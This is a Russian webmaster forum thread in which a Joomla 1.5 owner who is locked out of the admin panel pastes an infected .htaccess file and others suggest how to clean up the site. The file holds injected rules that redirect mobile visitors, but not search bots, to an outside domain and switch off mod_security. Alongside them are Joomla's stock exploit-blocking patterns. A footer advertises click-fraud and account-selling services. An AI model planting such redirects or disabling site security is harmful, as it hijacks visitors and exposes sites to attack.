Не могу зайти в админку сайта. Вирус?

Сообщений: 871 Регистрация: Сен 2011

9 Апреля 2012 12:37

Здравствуйте! Сайт джумла 1.5 Перестал пускать в админку сайта. После введения правильного (и даже неправильного) пароля идет обновление страницы без какого-либо сообщения.
Я попробовал поменять пароль через PHPMyAdmin но это ничего не дало.
Плагины авторизации и com_uzers включены (везде стоит 1). Может отключены куки? Но я не знаю где это смотреть (буду благодарен, если подскажите).

А сегодня зашел в файл .htaccess и увидел там такое (выделенным цветом).

Код я удалил, но авторизироваться в админку все равно не могу. Не поскажите где еще теоретически нужно подчистить? :

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} MIDP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} WAP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Windows.CE [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !ipad [NC]
RewriteCond %{HTTP_USER_AGENT} !iphone [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteRule ^(.*)$ http://сайт.ru/ [L,R=302]
##
# @version $Id: htaccess.txt 14401 2010-01-26 14:10:00Z louis $
# @package Joomla
# @copyright Copyright © 2005 - 2010 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##

#####################################################
# READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations. It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file. If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's. If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################

## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
# mod_rewrite in use

RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension xml files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension xml files
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*$.*$ [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root)

# RewriteBase /

########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$ [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section
<IfModule mod_security.c>
# Disable mod_security
SecFilterEngine Off
</IfModule>

Код я удалил, но авторизироваться в админку все равно не могу. Не поскажите где еще теоретически нужно подчистить?

Изменено: Андрюха - 9 Апреля 2012 12:43

Yapy

Сообщений: 583 Регистрация: Дек 2011

9 Апреля 2012 19:41

Цитата
Андрюха пишет: Я попробовал поменять пароль через PHPMyAdmin но это ничего не дало.

Вы просто поменяли пароль в БД и рассчитывали, что такой же нужно будет вводить при заходе на сайт?

О сколько нам открытий чудных готовит продвиженья путь:
И Google, сын ошибок трудных, и Yandex, парадоксов друг :)
Дешёвый хостинг для новичков и про

Андрюха

Сообщений: 871 Регистрация: Сен 2011

10 Апреля 2012 13:01

Цитата

Yapy пишет:

Цитата
Андрюха пишет: Я попробовал поменять пароль через PHPMyAdmin но это ничего не дало.

Вы просто поменяли пароль в БД и рассчитывали, что такой же нужно будет вводить при заходе на сайт?

Не-нет )) Я поменял в БД пароль администратора в плагине юзеров. Но там дело не в пароле. Потому-что страница авторизации на правильный и неправильный пароль не реагирует вообще никак. И зарегистрироваться на сайте тоже нельзя. Такое впечатление что отключены плагины авторизации и регистрации. Но я смотрел в БД - они все включены.
А что Вы думаете насчет того кода в файле .htaccess. Могло ли это повлиять?

Злой Админ

Сообщений: 466 Регистрация: Апр 2012

10 Апреля 2012 13:32

Ну я б на вашем месте

1) дернул дернул бы только базу и папку images.

2) И на локал хосте собрал бы новый сайт со всеми компонетнеами и модулями, что у вас сейчас стоят на сайте, и импотнул бы старую базу, предварительно протестив ее антивирем

Ибо по ходу Ваш сайт не только ломанули но и понавнедряли всякую бяку + код попортили

Олег

Сообщений: 13 Регистрация: Июл 2010

21 Мая 2012 14:04

Проверяй все файлы с расширением js.
Сам недавно чистил эту заразу.
Проще всего все содержимое сайта скопируй в какую нибудь папку к себе на комп и напусти на нее kasperskiy removal tool.
Она эту дрянь видит но не лечит. Далее либо зараженные файлы js восстанавливать из бэкапа (мой случай) либо вручную править зараженные файлы.
Зараза свой код дописывает в конце. Но это муторно - у меня было заражено штук по 150 на каждом сайте.

ub5080313 Сообщений: 254 Регистрация: Апр 2010	#6 22 Мая 2012 06:59 Гы, у меня такое на ВП было))) Пол дня голову ламал, потом админам (хостинга) тикет написал и спать пошел. С утра все было зашибись)))

24.02.2015 16:53	Не могу избавиться от "вируса"
07.05.2013 16:32	Не могу заблокировать чужой IP, почему-то блокируется мой собственный.
20.04.2013 14:04	Помогите. Не могу удалить Fishing файлы в корневой папке Wordpress
08.10.2012 14:48	не могу зайти на сайт

Новые темы	Объявления	Свободное общение
21:49 Как правильно покупать ссылки для поддомена? 18:51 Роскомнадзор отказал в регистрации трети блогеров-десятитысячников 12:53 где много готовых фавиконок 22:59 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 12:32 «Хлебные крошки» в адресе сайтов исчезнут из результатов поиска Google 23:27 Adfinity - Ваш надежный партнер в монетизации трафика 16:55 Инструменты для массового постинга в WordPress	20:19 GoogleWalker - устранение конкурентов в Google Ads \| Автоматизированная система склика \| АНТИБАН 16:39 Продам аккаунты Gmail USA IP \| Gmail MIX IP \| Outlook Old 11:07 Мобильные и Резидентные Прокси Для Соц Сетей \| 3 Гб Бесплатно 11:01 Защитим твой ресурс от блокировки Роскомнадзора 10:09 BestChange – обменивать электронную валюту можно быстро и выгодно 06:50 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 03:42 A-Parser 1.1 - продвинутый парсер поисковых систем, Suggest, PR, DMOZ, Whois, etc	07:48 США готовят закон для уничтожения пиратских сайтов во всех странах мира 02:50 Точные прогнозы на футбол 02:10 [Новая партнерка] Goldbet Partners — прямой рекламодатель одноименного казино Goldbet 21:19 С юмором по жизни! 18:15 Telegram уничтожил официальный канал легендарного российского торрент-трекера 18:19 Уникальный сервис SEO продвижения 14:45 (затёр сайт)